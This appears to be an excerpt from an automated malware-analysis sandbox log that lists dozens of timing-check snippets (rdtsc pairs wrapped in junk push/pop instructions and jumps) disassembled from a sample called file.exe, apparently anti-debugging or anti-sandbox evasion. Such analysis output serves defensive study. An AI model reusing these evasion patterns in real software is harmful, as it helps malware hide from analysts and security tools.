                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667F10 second address: 667F1C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F79113F079Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666C9E second address: 666CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CA4 second address: 666CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Dh 0x00000007 jmp 00007F79113F07A2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jp 00007F79113F0796h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CD1 second address: 666CE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CE0 second address: 666CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CE4 second address: 666CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666CE8 second address: 666CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6412 second address: 5E6461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F79111F4F00h 0x0000000a jmp 00007F79111F4EFAh 0x0000000f push eax 0x00000010 jc 00007F79111F4EF6h 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f jmp 00007F79111F4EFCh 0x00000024 jnl 00007F79111F4EF6h 0x0000002a popad 0x0000002b push edi 0x0000002c jmp 00007F79111F4F00h 0x00000031 jnc 00007F79111F4EF6h 0x00000037 pop edi 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66727A second address: 667296 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F79113F079Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F79113F0796h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667664 second address: 667669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667669 second address: 66768A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A0h 0x00000007 jp 00007F79113F0798h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66768A second address: 66768E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66768E second address: 6676A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667837 second address: 66783B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66783B second address: 667841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667981 second address: 667989 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613A85 second address: 613A9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F79113F079Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666A4 second address: 6666B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666B1 second address: 6666B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666B7 second address: 6666C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4936 second address: 5E493B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E493B second address: 5E4947 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F79111F4EFEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4947 second address: 5E4951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B5F1 second address: 66B602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F79111F4EF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632F33 second address: 632F51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F79113F0796h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632F51 second address: 632FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b movzx ecx, bx 0x0000000e lea eax, dword ptr [ebp+12492C95h] 0x00000014 mov di, AC21h 0x00000018 sub dword ptr [ebp+122D3244h], edx 0x0000001e nop 0x0000001f jmp 00007F79111F4F08h 0x00000024 push eax 0x00000025 pushad 0x00000026 push edi 0x00000027 push edi 0x00000028 pop edi 0x00000029 pop edi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632FA1 second address: 632FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632FA5 second address: 612F49 instructions: 0x00000000 rdtsc 0x00000002 js 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F79111F4EF8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+1245F548h], esi 0x0000002c sub dword ptr [ebp+122D31FAh], ecx 0x00000032 call dword ptr [ebp+122D39B6h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d jns 00007F79111F4EF6h 0x00000043 pop edx 0x00000044 jmp 00007F79111F4F03h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633162 second address: 633169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633523 second address: 633529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633529 second address: 633548 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F79113F0798h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F79113F07A0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633548 second address: 63357E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79111F4EFCh 0x00000008 jo 00007F79111F4EF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jbe 00007F79111F4F0Bh 0x0000001a jmp 00007F79111F4F05h 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63357E second address: 633596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F79113F0798h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633596 second address: 633614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub dword ptr [ebp+122D1C42h], esi 0x00000011 call 00007F79111F4EF9h 0x00000016 jmp 00007F79111F4EFBh 0x0000001b push eax 0x0000001c jmp 00007F79111F4F06h 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 jmp 00007F79111F4EFEh 0x0000002a mov eax, dword ptr [eax] 0x0000002c jno 00007F79111F4EFEh 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F79111F4F02h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633614 second address: 63361A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63361A second address: 63361E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633DB4 second address: 633E32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F79113F0798h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ecx, 45BDF078h 0x00000029 pushad 0x0000002a jnc 00007F79113F079Ch 0x00000030 popad 0x00000031 push 0000001Eh 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F79113F0798h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d clc 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F79113F07A9h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633E32 second address: 633E3C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633E3C second address: 633E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79113F07A6h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633E5F second address: 633E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F79111F4EF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6341AC second address: 6341BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79113F079Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6341BC second address: 6341C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6341C0 second address: 6341CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6341CF second address: 6341DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4EFBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B918 second address: 66B91D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BA65 second address: 66BA6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BBF4 second address: 66BBFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BBFA second address: 66BC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BC00 second address: 66BC04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BC04 second address: 66BC25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F79111F4EFBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jng 00007F79111F4EF6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BC25 second address: 66BC29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BC29 second address: 66BC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F79111F4F02h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BC43 second address: 66BC4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79113F079Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BED1 second address: 66BEE0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F79111F4EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BEE0 second address: 66BEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F07A0h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BEF5 second address: 66BEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BEFB second address: 66BEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BEFF second address: 66BF1B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F79111F4F02h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BF1B second address: 66BF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F079Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BF2C second address: 66BF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66BF30 second address: 66BF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67AC93 second address: 67AC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 679B7D second address: 679B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 679B81 second address: 679B9E instructions: 0x00000000 rdtsc 0x00000002 js 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79111F4F01h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 679B9E second address: 679BAA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F79113F0796h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A135 second address: 67A139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A139 second address: 67A13D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6796F3 second address: 6796F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6796F9 second address: 679708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jno 00007F79113F0796h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 679708 second address: 67970E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67970E second address: 679712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 679712 second address: 679716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A6BF second address: 67A6C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A6C5 second address: 67A6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F79111F4EF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67A6D0 second address: 67A6D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67CE31 second address: 67CE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jnc 00007F79111F4EF6h 0x00000010 jmp 00007F79111F4EFBh 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680F81 second address: 680F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680F85 second address: 680FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4EFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F79111F4EF8h 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680FA7 second address: 680FBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Bh 0x00000007 jno 00007F79113F07A2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 681273 second address: 68127B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68127B second address: 68127F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68127F second address: 681283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 681283 second address: 681292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F79113F0796h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68141F second address: 68142B instructions: 0x00000000 rdtsc 0x00000002 js 00007F79111F4EF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6866AC second address: 6866CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F07A8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686828 second address: 68682C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68682C second address: 686832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 686832 second address: 68684E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F02h 0x00000009 jnl 00007F79111F4EF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68706E second address: 6870AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A3h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F79113F07B1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6870AE second address: 6870C6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79111F4F0Ah 0x00000008 jmp 00007F79111F4EFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F3DB5 second address: 5F3DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F3DBA second address: 5F3DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F79111F4EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68D07E second address: 68D091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F079Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
